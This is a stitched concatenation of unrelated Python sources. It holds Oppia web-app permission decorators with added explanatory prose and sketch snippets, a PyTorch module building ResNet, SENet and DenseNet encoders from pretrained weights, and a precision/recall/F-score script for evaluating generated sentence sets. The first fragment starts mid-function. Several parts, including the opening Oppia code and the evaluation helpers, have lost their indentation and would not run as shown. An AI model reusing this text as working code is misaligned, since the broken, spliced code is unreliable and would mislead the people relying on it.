self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic_rights = topic_fetchers.get_topic_rights(topic_id)
topic_is_published = topic_rights.topic_is_published
all_story_references = topic.get_all_story_references()
for reference in all_story_references:
if reference.story_id == story_id:
story_is_published = reference.story_is_published
if (
(story_is_published and topic_is_published) or
role_services.ACTION_VISIT_ANY_TOPIC_EDITOR in
user_actions_info.actions):
return handler(self, story_id, *args, **kwargs)
else:
raise self.PageNotFoundException
test_can_access.__wrapped__ = True
return test_can_access
def can_access_subtopic_viewer_page(handler):
"""Decorator to check whether user can access subtopic page viewer.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can access the given subtopic viewer page.
"""
def test_can_access(
self, classroom_url_fragment, topic_url_fragment,
subtopic_url_fragment, **kwargs):
"""Checks if the user can access subtopic viewer page.
Args:
classroom_url_fragment: str. The classroom url fragment.
topic_url_fragment: str. The url fragment of the topic
associated with the subtopic.
subtopic_url_fragment: str. The url fragment of the subtopic.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
if subtopic_url_fragment != subtopic_url_fragment.lower():
_redirect_based_on_return_type(
self, '/learn/%s/%s/revision/%s' % (
classroom_url_fragment,
topic_url_fragment,
subtopic_url_fragment.lower()),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic = topic_fetchers.get_topic_by_url_fragment(topic_url_fragment)
subtopic_id = None
if topic is None:
_redirect_based_on_return_type(
self, '/learn/%s' % classroom_url_fragment,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
user_actions_info = user_services.get_user_actions_info(self.user_id)
topic_rights = topic_fetchers.get_topic_rights(topic.id)
if (
(topic_rights is None or not topic_rights.topic_is_published)
and role_services.ACTION_VISIT_ANY_TOPIC_EDITOR not in
user_actions_info.actions):
_redirect_based_on_return_type(
self, '/learn/%s' % classroom_url_fragment,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
for subtopic in topic.subtopics:
if subtopic.url_fragment == subtopic_url_fragment:
subtopic_id = subtopic.id
if not subtopic_id:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/revision' %
(classroom_url_fragment, topic_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
verified_classroom_url_fragment = (
classroom_services.get_classroom_url_fragment_for_topic_id(
topic.id))
if classroom_url_fragment != verified_classroom_url_fragment:
url_substring = '%s/revision/%s' % (
topic_url_fragment, subtopic_url_fragment)
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
verified_classroom_url_fragment,
url_substring),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
subtopic_page = subtopic_page_services.get_subtopic_page_by_id(
topic.id, subtopic_id, strict=False)
if subtopic_page is None:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/revision' % (
classroom_url_fragment, topic_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
else:
return handler(self, topic.name, subtopic_id, **kwargs)
test_can_access.__wrapped__ = True
return test_can_access
def get_decorator_for_accepting_suggestion(decorator):
    """Function that takes a decorator as an argument and then applies some
    common checks and then checks the permissions specified by the passed in
    decorator.

    Args:
        decorator: function. The decorator to be used to verify permissions
            for accepting/rejecting suggestions.

    Returns:
        function. The new decorator which includes all the permission checks
            for accepting/rejecting suggestions. These permissions include:
            - Admins can accept/reject any suggestion.
            - Users with scores above threshold can accept/reject any
              suggestion in that category.
            - Any user with edit permissions to the target entity can
              accept/reject suggestions for that entity.
    """

    def generate_decorator_for_handler(handler):
        """Function that generates a decorator for a given handler.

        Args:
            handler: function. The function to be decorated.

        Returns:
            function. The newly decorated function that has common checks and
            permissions specified by passed in decorator.

        Raises:
            NotLoggedInException. The user is not logged in.
        """
        def test_can_accept_suggestion(
                self, target_id, suggestion_id, **kwargs):
            """Returns a (possibly-decorated) handler to test whether a
            suggestion can be accepted based on the user actions and roles.

            Args:
                target_id: str. The target id.
                suggestion_id: str. The suggestion id.
                **kwargs: *. Keyword arguments.

            Returns:
                function. The (possibly-decorated) handler for accepting a
                suggestion.

            Raises:
                NotLoggedInException. The user is not logged in.
            """
            if not self.user_id:
                raise base.UserFacingExceptions.NotLoggedInException
            user_actions = user_services.get_user_actions_info(
                self.user_id
            ).actions
            if role_services.ACTION_ACCEPT_ANY_SUGGESTION in user_actions:
                return handler(self, target_id, suggestion_id, **kwargs)

            if len(suggestion_id.split('.')) != 3:
                raise self.InvalidInputException(
                    'Invalid format for suggestion_id.'
                    ' It must contain 3 parts separated by \'.\'')

            suggestion = suggestion_services.get_suggestion_by_id(suggestion_id)
            if suggestion is None:
                raise self.PageNotFoundException

            # TODO(#6671): Currently, the can_user_review_category is
            # not in use as the suggestion scoring system is not enabled.
            # Remove this check once the new scoring structure gets implemented.
            if suggestion_services.can_user_review_category(
                    self.user_id, suggestion.score_category):
                return handler(self, target_id, suggestion_id, **kwargs)

            if suggestion.suggestion_type == (
                    feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT):
                if user_services.can_review_translation_suggestions(
                        self.user_id,
                        language_code=suggestion.change.language_code):
                    return handler(self, target_id, suggestion_id, **kwargs)
            elif suggestion.suggestion_type == (
                    feconf.SUGGESTION_TYPE_ADD_QUESTION):
                if user_services.can_review_question_suggestions(self.user_id):
                    return handler(self, target_id, suggestion_id, **kwargs)

            return decorator(handler)(self, target_id, suggestion_id, **kwargs)
        test_can_accept_suggestion.__wrapped__ = True

        return test_can_accept_suggestion

    return generate_decorator_for_handler

def can_view_reviewable_suggestions(handler):
    """Decorator to check whether user can view the list of suggestions that
    they are allowed to review.

    Args:
        handler: function. The function to be decorated.

    Returns:
        function. The newly decorated function that now checks
        if the user can view reviewable suggestions.
    """
    def test_can_view_reviewable_suggestions(
            self, target_type, suggestion_type, **kwargs):
        """Checks whether the user can view reviewable suggestions.

        Args:
            target_type: str. The entity type of the target of the suggestion.
            suggestion_type: str. The type of the suggestion.
            **kwargs: *. Keyword arguments.

        Returns:
            *. The return value of the decorated function.

        Raises:
            PageNotFoundException. The given page cannot be found.
        """
        if not self.user_id:
            raise base.UserFacingExceptions.NotLoggedInException
        if suggestion_type == (
                feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT):
            if user_services.can_review_translation_suggestions(self.user_id):
                return handler(self, target_type, suggestion_type, **kwargs)
        elif suggestion_type == (
                feconf.SUGGESTION_TYPE_ADD_QUESTION):
            if user_services.can_review_question_suggestions(self.user_id):
                return handler(self, target_type, suggestion_type, **kwargs)
        else:
            raise self.PageNotFoundException
    test_can_view_reviewable_suggestions.__wrapped__ = True

    return test_can_view_reviewable_suggestions

def can_edit_entity(handler):
    """Decorator to check whether user can edit entity.

    Args:
        handler: function. The function to be decorated.

    Returns:
        function. The newly decorated function that now checks
        if the user can edit the entity.
    """
    def test_can_edit_entity(self, entity_type, entity_id, **kwargs):
        """Checks if the user can edit entity.

        Args:
            entity_type: str. The type of entity i.e. exploration, question etc.
            entity_id: str. The ID of the entity.
            **kwargs: *. Keyword arguments.

        Returns:
            *. The return value of the decorated function.

        Raises:
            PageNotFoundException. The given page cannot be found.
        """
        arg_swapped_handler = lambda x, y, z: handler(y, x, z)
        # This swaps the first two arguments (self and entity_type), so
        # that functools.partial can then be applied to the leftmost one to
        # create a modified handler function that has the correct signature
        # for the corresponding decorators.
        reduced_handler = functools.partial(
            arg_swapped_handler, entity_type)
        if entity_type == feconf.ENTITY_TYPE_EXPLORATION:
            return can_edit_exploration(reduced_handler)(
                self, entity_id, **kwargs)
        elif entity_type == feconf.ENTITY_TYPE_QUESTION:
            return can_edit_question(reduced_handler)(self, entity_id, **kwargs)
        elif entity_type == feconf.ENTITY_TYPE_TOPIC:
            return can_edit_topic(reduced_handler)(self, entity_id, **kwargs)
        elif entity_type == feconf.ENTITY_TYPE_SKILL:
            return can_edit_skill(reduced_handler)(self, entity_id, **kwargs)
        elif entity_type == feconf.ENTITY_TYPE_STORY:
            return can_edit_story(reduced_handler)(self, entity_id, **kwargs)
        else:
            raise self.PageNotFoundException
    test_can_edit_entity.__wrapped__ = True

    return test_can_edit_entity

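The argument-swapping trick in `can_edit_entity` is subtle: the lambda swaps `self` and `entity_type` so that `functools.partial` can bind `entity_type` first, producing a handler with the `(self, entity_id)` signature that the per-type decorators expect. A minimal, self-contained sketch of that mechanism (the names and the `'exploration'` value are illustrative stand-ins, not Oppia's code):

```python
import functools

# Stand-in handler with the (self, entity_type, entity_id) signature that
# can_edit_entity-style dispatch assumes.
def handler(self, entity_type, entity_id):
    return (self, entity_type, entity_id)

# Swap the first two positional arguments, then bind entity_type so the
# resulting callable has the (self, entity_id) signature.
arg_swapped_handler = lambda x, y, z: handler(y, x, z)
reduced_handler = functools.partial(arg_swapped_handler, 'exploration')

print(reduced_handler('SELF', 'exp123'))  # ('SELF', 'exploration', 'exp123')
```

Without the swap, `functools.partial` would bind `self` (the leftmost parameter), which is not known until the request arrives.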
def can_play_entity(handler):
    """Decorator to check whether user can play entity.

    Args:
        handler: function. The function to be decorated.

    Returns:
        function. The newly decorated function that now checks
        if the user can play the entity.
    """
    def test_can_play_entity(self, entity_type, entity_id, **kwargs):
        """Checks if the user can play entity.

        Args:
            entity_type: str. The type of entity i.e. exploration, question etc.
            entity_id: str. The ID of the entity.
            **kwargs: *. Keyword arguments.

        Returns:
            *. The return value of the decorated function.

        Raises:
            PageNotFoundException. The given page cannot be found.
        """
        arg_swapped_handler = lambda x, y, z: handler(y, x, z)
        if entity_type == feconf.ENTITY_TYPE_EXPLORATION:
            # This swaps the first two arguments (self and entity_type), so
            # that functools.partial can then be applied to the leftmost one to
            # create a modified handler function that has the correct signature
            # for can_play_exploration().
            reduced_handler = functools.partial(
                arg_swapped_handler, feconf.ENTITY_TYPE_EXPLORATION)
            # This raises an error if the exploration checks fail.
            return can_play_exploration(reduced_handler)(
                self, entity_id, **kwargs)
        elif entity_type == feconf.ENTITY_TYPE_QUESTION:
            reduced_handler = functools.partial(
                arg_swapped_handler, feconf.ENTITY_TYPE_QUESTION)
            return can_play_question(reduced_handler)(
                self, entity_id, **kwargs)
        else:
            raise self.PageNotFoundException
    test_can_play_entity.__wrapped__ = True

    return test_can_play_entity

def is_from_oppia_ml(handler):
    """Decorator to check whether the incoming request is from a valid Oppia-ML
    VM instance.

    Args:
        handler: function. The function to be decorated.

    Returns:
        function. The newly decorated function that now can check if incoming
        request is from a valid VM instance.
    """
    def test_request_originates_from_valid_oppia_ml_instance(self, **kwargs):
        """Checks if the incoming request is from a valid Oppia-ML VM
        instance.

        Args:
            **kwargs: *. Keyword arguments.

        Returns:
            *. The return value of the decorated function.

        Raises:
            UnauthorizedUserException. If incoming request is not from a valid
                Oppia-ML VM instance.
        """
        oppia_ml_auth_info = (
            self.extract_request_message_vm_id_and_signature())
        if (oppia_ml_auth_info.vm_id == feconf.DEFAULT_VM_ID and
                not constants.DEV_MODE):
            raise self.UnauthorizedUserException
        if not classifier_services.verify_signature(oppia_ml_auth_info):
            raise self.UnauthorizedUserException

        return handler(self, **kwargs)
    test_request_originates_from_valid_oppia_ml_instance.__wrapped__ = True

    return test_request_originates_from_valid_oppia_ml_instance

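`classifier_services.verify_signature` is Oppia's own check and its internals are not shown here. As a generic illustration only (an assumption about the technique, not Oppia's implementation), message authentication of this kind is commonly done with an HMAC computed over the message using a shared per-VM secret:

```python
import hashlib
import hmac

SHARED_SECRET = b'per-vm-shared-secret'  # hypothetical value

def sign(message):
    # The sender computes an HMAC-SHA256 tag over the message.
    return hmac.new(SHARED_SECRET, message, hashlib.sha256).hexdigest()

def verify(message, signature):
    # compare_digest avoids timing side channels on the comparison.
    return hmac.compare_digest(sign(message), signature)

good = sign(b'train-job-42')
print(verify(b'train-job-42', good))   # True
print(verify(b'train-job-43', good))   # False
```

Only a party holding the shared secret can produce a tag that verifies, which is what lets the server reject requests that do not come from a registered VM.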
def can_update_suggestion(handler):
    """Decorator to check whether the current user can update suggestions.

    Args:
        handler: function. The function to be decorated.

    Returns:
        function. The newly decorated function that now checks
        if the user can update a given suggestion.

    Raises:
        NotLoggedInException. The user is not logged in.
        UnauthorizedUserException. The user does not have credentials to
            edit this suggestion.
        InvalidInputException. The submitted suggestion id is not valid.
        PageNotFoundException. A suggestion is not found with the given
            suggestion id.
    """
    def test_can_update_suggestion(
            self, suggestion_id, **kwargs):
        """Returns a handler to test whether a suggestion can be updated based
        on the user's roles.

        Args:
            suggestion_id: str. The suggestion id.
            **kwargs: *. Keyword arguments.

        Returns:
            function. The handler for updating a suggestion.

        Raises:
            NotLoggedInException. The user is not logged in.
            UnauthorizedUserException. The user does not have credentials to
                edit this suggestion.
            InvalidInputException. The submitted suggestion id is not valid.
            PageNotFoundException. A suggestion is not found with the given
                suggestion id.
        """
        if not self.user_id:
            raise base.UserFacingExceptions.NotLoggedInException
        user_actions = self.user.actions

        if len(suggestion_id.split('.')) != 3:
            raise self.InvalidInputException(
                'Invalid format for suggestion_id.' +
                ' It must contain 3 parts separated by \'.\'')

        suggestion = suggestion_services.get_suggestion_by_id(suggestion_id)
        if suggestion is None:
            raise self.PageNotFoundException

        if role_services.ACTION_ACCEPT_ANY_SUGGESTION in user_actions:
            return handler(self, suggestion_id, **kwargs)

        if suggestion.author_id == self.user_id:
            raise base.UserFacingExceptions.UnauthorizedUserException(
                'You are not allowed to update suggestions that you created.')

        if suggestion.suggestion_type not in (
                feconf.CONTRIBUTOR_DASHBOARD_SUGGESTION_TYPES):
            raise self.InvalidInputException('Invalid suggestion type.')

        if suggestion.suggestion_type == (
                feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT):
            if user_services.can_review_translation_suggestions(
                    self.user_id,
                    language_code=suggestion.change.language_code):
                return handler(self, suggestion_id, **kwargs)
        elif suggestion.suggestion_type == (
                feconf.SUGGESTION_TYPE_ADD_QUESTION):
            if user_services.can_review_question_suggestions(self.user_id):
                return handler(self, suggestion_id, **kwargs)

        raise base.UserFacingExceptions.UnauthorizedUserException(
            'You are not allowed to update the suggestion.')
    test_can_update_suggestion.__wrapped__ = True

    return test_can_update_suggestion
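All of the decorators above share one shape: an inner test function runs access checks, then either calls the wrapped handler or raises, and is finally marked with `__wrapped__ = True` so other code can detect that the handler is decorated. A minimal, hypothetical sketch of that shape (the decorator name and check are illustrative, not Oppia's actual checks, and `PermissionError` stands in for Oppia's exception classes):

```python
# Hypothetical access-check decorator following the same pattern as above.
def can_do_something(handler):
    def test_can_do_something(self, entity_id, **kwargs):
        # Permission check first; only then delegate to the real handler.
        if not getattr(self, 'user_id', None):
            raise PermissionError('Not logged in.')
        return handler(self, entity_id, **kwargs)
    # Marker used to detect that a handler has been decorated.
    test_can_do_something.__wrapped__ = True
    return test_can_do_something

class FakeHandler:
    user_id = 'uid1'

    @can_do_something
    def get(self, entity_id):
        return 'ok:%s' % entity_id

print(FakeHandler().get('exp123'))  # ok:exp123
```

An anonymous request (one where `user_id` is falsy) never reaches the wrapped handler; the check raises before delegation.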
# models/encoders.py (from the romavlasov/idrnd-anti-spoofing-challenge repository, MIT license)

import re
import torch
import torch.nn as nn
from torch.utils import model_zoo
from models.backbones.mobilenet import MobileNet
from models.backbones.resnet import ResNet
from models.backbones.resnet import BasicBlock
from models.backbones.resnet import Bottleneck
from models.backbones.senet import SENet
from models.backbones.senet import SEBottleneck
from models.backbones.senet import SEResNetBottleneck
from models.backbones.senet import SEResNeXtBottleneck
from models.backbones.densenet import DenseNet
from models.blocks import build_layers
def mobilenet(device='cpu', *argv, **kwargs):
    model = MobileNet(*argv, **kwargs)
    return model.to(device)


def resnet18(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet18-5c106cde.pth'))
    model.fc = nn.Linear(model.fc.in_features, out_features)
    return model.to(device)


def resnet34(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet34-333f7ec4.pth'))
    model.fc = nn.Linear(model.fc.in_features, out_features)
    return model.to(device)


def resnet50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet50-19c8e357.pth'))
    model.fc = nn.Linear(model.fc.in_features, out_features)
    return model.to(device)


def resnet101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet101-5d3b4d8f.pth'))
    model.fc = nn.Linear(model.fc.in_features, out_features)
    return model.to(device)


def resnet152(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnet152-b121ed2d.pth'))
    model.fc = nn.Linear(model.fc.in_features, out_features)
    return model.to(device)


def resnext50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    kwargs['groups'] = 32
    kwargs['width_per_group'] = 4
    model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth'))
    model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
    return model.to(device)


def resnext101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    kwargs['groups'] = 32
    kwargs['width_per_group'] = 8
    model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth'))
    model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
    return model.to(device)

def senet154(device='cpu', *argv, **kwargs):
    model = SENet(SEBottleneck, [3, 8, 36, 3], groups=64, reduction=16,
                  **kwargs)
    return model.to(device)


def se_resnet50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = SENet(SEResNetBottleneck, [3, 4, 6, 3], groups=1, reduction=16,
                  inplanes=64, input_3x3=False,
                  downsample_kernel_size=1, downsample_padding=0,
                  **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('http://data.lip6.fr/cadene/pretrainedmodels/se_resnet50-ce0d4300.pth'))
    model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
    return model.to(device)


def se_resnet101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = SENet(SEResNetBottleneck, [3, 4, 23, 3], groups=1, reduction=16,
                  inplanes=64, input_3x3=False,
                  downsample_kernel_size=1, downsample_padding=0,
                  **kwargs)
    return model.to(device)


def se_resnet152(device='cpu', *argv, **kwargs):
    model = SENet(SEResNetBottleneck, [3, 8, 36, 3], groups=1, reduction=16,
                  inplanes=64, input_3x3=False,
                  downsample_kernel_size=1, downsample_padding=0,
                  **kwargs)
    return model.to(device)


def se_resnext50(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = SENet(SEResNeXtBottleneck, [3, 4, 6, 3], groups=32, reduction=16,
                  inplanes=64, input_3x3=False,
                  downsample_kernel_size=1, downsample_padding=0,
                  **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('http://data.lip6.fr/cadene/pretrainedmodels/se_resnext50_32x4d-a260b3a4.pth'))
    model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
    return model.to(device)


def se_resnext101(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = SENet(SEResNeXtBottleneck, [3, 4, 23, 3], groups=32, reduction=16,
                  inplanes=64, input_3x3=False,
                  downsample_kernel_size=1, downsample_padding=0,
                  **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url('http://data.lip6.fr/cadene/pretrainedmodels/se_resnext101_32x4d-3b2fe3d8.pth'))
    model.last_linear = nn.Linear(model.last_linear.in_features, out_features)
    return model.to(device)

def densenet121(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = DenseNet(32, (6, 12, 24, 16), 64, **kwargs)
    if pretrained:
        _load_densenet(model, 'https://download.pytorch.org/models/densenet121-a639ec97.pth')
    #model.features.add_module('final', build_layers(1024))
    model.classifier = nn.Linear(model.classifier.in_features, out_features)
    return model.to(device)


def densenet201(device='cpu', out_features=1, pretrained=False, *argv, **kwargs):
    model = DenseNet(32, (6, 12, 48, 32), 64, **kwargs)
    if pretrained:
        _load_densenet(model, 'https://download.pytorch.org/models/densenet201-c1103571.pth')
    model.classifier = nn.Linear(model.classifier.in_features, out_features)
    return model.to(device)


def _load_densenet(model, model_url):
    # Older DenseNet checkpoints use dotted keys (e.g. 'norm.1.weight') that
    # must be renamed (to 'norm1.weight') before loading.
    pattern = re.compile(
        r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
    state_dict = model_zoo.load_url(model_url)
    for key in list(state_dict.keys()):
        res = pattern.match(key)
        if res:
            new_key = res.group(1) + res.group(2)
            state_dict[new_key] = state_dict[key]
            del state_dict[key]
    model.load_state_dict(state_dict)
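Every factory in this module follows the same recipe: build a backbone, optionally load pretrained ImageNet weights, then replace the final classifier layer so its output size matches `out_features`. A torch-free sketch of that recipe (the classes below are illustrative stand-ins, not the real backbones):

```python
# Stand-in for nn.Linear: just records its in/out sizes.
class Linear:
    def __init__(self, in_features, out_features):
        self.in_features = in_features
        self.out_features = out_features

# Stand-in backbone whose pretrained head is 1000-way (ImageNet classes).
class Backbone:
    def __init__(self):
        self.fc = Linear(512, 1000)

def resnet_like(out_features=1, pretrained=False):
    model = Backbone()
    if pretrained:
        pass  # the real code calls model.load_state_dict(model_zoo.load_url(...)) here
    # Swap the head: keep the feature width, change the number of outputs.
    model.fc = Linear(model.fc.in_features, out_features)
    return model

m = resnet_like(out_features=1)
print(m.fc.in_features, m.fc.out_features)  # 512 1
```

Replacing the head after loading the checkpoint is what allows ImageNet weights (trained for 1000 classes) to be reused for a single-logit anti-spoofing output.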
# data/setAnalysis.py (from the iesus/systematicity-sentence-production repository, BSD-3-Clause license)

'''
Created on Apr 22, 2016
@author: jesus
Methods to evaluate how the sentence set generated by the production model resembles the set that is related to each DSS
'''
def indicesToWords(indices,indexWordMapping):
return [indexWordMapping[index] for index in indices]
#precision=correctpredictions/allretrieved
def getPrecision(sizeCorrectPredictionsSet,sizeRetrievedSet):
if sizeRetrievedSet==0:return 0
else:
return sizeCorrectPredictionsSet*1.0/sizeRetrievedSet
#recall=correctpredictions/allexpected
def getRecall(sizeCorrectPredictionsSet,sizeExpectedSet):
return sizeCorrectPredictionsSet*1.0/sizeExpectedSet
#fscore=2*precision*recall/(precision+recall)
def getFScore(precision,recall):
if precision+recall==0:return 0
else:
return 2.0*(precision*recall)/(precision+recall)
def precisionRecallFScore(expectedSet, retrievedSet):
    sizeExpectedSet = len(expectedSet)
    sizeRetrievedSet = len(retrievedSet)

    #Find the overlap of the sets (correct predictions)
    copyExpectedSet = expectedSet[:]
    copyRetrievedSet = retrievedSet[:]
    for elem1 in copyExpectedSet[:]:
        for elem2 in copyRetrievedSet:
            if elem1 == elem2:
                copyExpectedSet.remove(elem1)
                copyRetrievedSet.remove(elem2)
                #Stop after the first match: each expected element may be
                #paired with at most one retrieved element, and breaking
                #avoids mutating copyRetrievedSet while iterating over it.
                break
    correctPredictions = sizeExpectedSet - len(copyExpectedSet)

    recall = getRecall(correctPredictions, sizeExpectedSet)
    precision = getPrecision(correctPredictions, sizeRetrievedSet)
    fscore = getFScore(precision, recall)

    return precision, recall, fscore

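As a quick sanity check on how these metrics behave, here is a self-contained re-implementation of the same multiset-overlap logic run on two small sets (the sets are made-up examples, not model output):

```python
def prf(expectedSet, retrievedSet):
    # Multiset overlap: each expected item is matched at most once.
    remaining = list(retrievedSet)
    correct = 0
    for item in expectedSet:
        if item in remaining:
            remaining.remove(item)
            correct += 1
    precision = correct * 1.0 / len(retrievedSet) if retrievedSet else 0
    recall = correct * 1.0 / len(expectedSet) if expectedSet else 0
    fscore = 2.0 * precision * recall / (precision + recall) if precision + recall else 0
    return precision, recall, fscore

expected = [[1, 2, 3], [4, 5], [6]]
retrieved = [[1, 2, 3], [4, 5], [7, 8], [9]]
print(prf(expected, retrieved))  # precision = 0.5, recall = 2/3, fscore = 4/7
```

Two of the four retrieved sentences are correct (precision 0.5) and two of the three expected sentences were produced (recall 2/3), so the F-score is their harmonic mean, 4/7.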
if __name__ == '__main__':
    #set1=[[0, 16, 39, 40, 13, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 18, 25, 42], [0, 16, 39, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 0, 15, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 18, 25, 42], [0, 16, 5, 32, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 0, 15, 19, 35, 27, 42]]
    #set2=[[0, 16, 5, 32, 40, 13, 1, 18, 25, 42], [0, 16, 39, 40, 13, 1, 0, 15, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 0, 15, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 39, 40, 13, 19, 35, 27, 42], [0, 16, 5, 32, 40, 13, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 18, 19, 35, 27, 42], [0, 16, 39, 40, 13, 1, 18, 25, 42]]
    set1=[[9, 39, 40, 13, 1, 31, 42], [9, 39, 40, 13, 1, 14, 42], [9, 39, 40, 13, 19, 35, 34, 42], [9, 39, 40, 13, 1, 31, 25, 42], [9, 39, 40, 13, 1, 31, 19, 35, 34, 42], [9, 39, 40, 13, 1, 14, 25, 42], [9, 39, 40, 13, 1, 14, 19, 35, 34, 42], [9, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 39, 1, 31, 40, 13, 42], [9, 39, 1, 14, 40, 13, 42], [9, 5, 32, 40, 13, 1, 31, 42], [9, 5, 32, 40, 13, 1, 14, 42], [9, 5, 32, 40, 13, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 31, 25, 42], [9, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 14, 25, 42], [9, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [9, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 32, 1, 31, 40, 13, 42], [9, 5, 32, 1, 14, 40, 13, 42], [9, 5, 0, 16, 40, 13, 1, 31, 42], [9, 5, 0, 16, 40, 13, 1, 14, 42], [9, 5, 0, 16, 40, 13, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 31, 25, 42], [9, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 14, 25, 42], [9, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [9, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [9, 5, 0, 16, 1, 31, 40, 13, 42], [9, 5, 0, 16, 1, 14, 40, 13, 42], [35, 7, 39, 40, 13, 1, 31, 42], [35, 7, 39, 40, 13, 1, 14, 42], [35, 7, 39, 40, 13, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 31, 25, 42], [35, 7, 39, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 14, 25, 42], [35, 7, 39, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 39, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 39, 1, 31, 40, 13, 42], [35, 7, 39, 1, 14, 40, 13, 42], [35, 7, 5, 32, 40, 13, 1, 31, 42], [35, 7, 5, 32, 40, 13, 1, 14, 42], [35, 7, 5, 32, 40, 13, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 31, 25, 42], [35, 7, 5, 32, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 14, 25, 42], [35, 7, 5, 32, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 5, 32, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 32, 1, 31, 40, 13, 42], [35, 7, 5, 32, 1, 14, 40, 13, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 42], [35, 7, 5, 0, 16, 40, 13, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 31, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 25, 42], [35, 7, 5, 0, 16, 40, 13, 1, 14, 19, 35, 34, 42], [35, 7, 5, 0, 16, 40, 13, 1, 0, 15, 19, 35, 34, 42], [35, 7, 5, 0, 16, 1, 31, 40, 13, 42], [35, 7, 5, 0, 16, 1, 14, 40, 13, 42]]
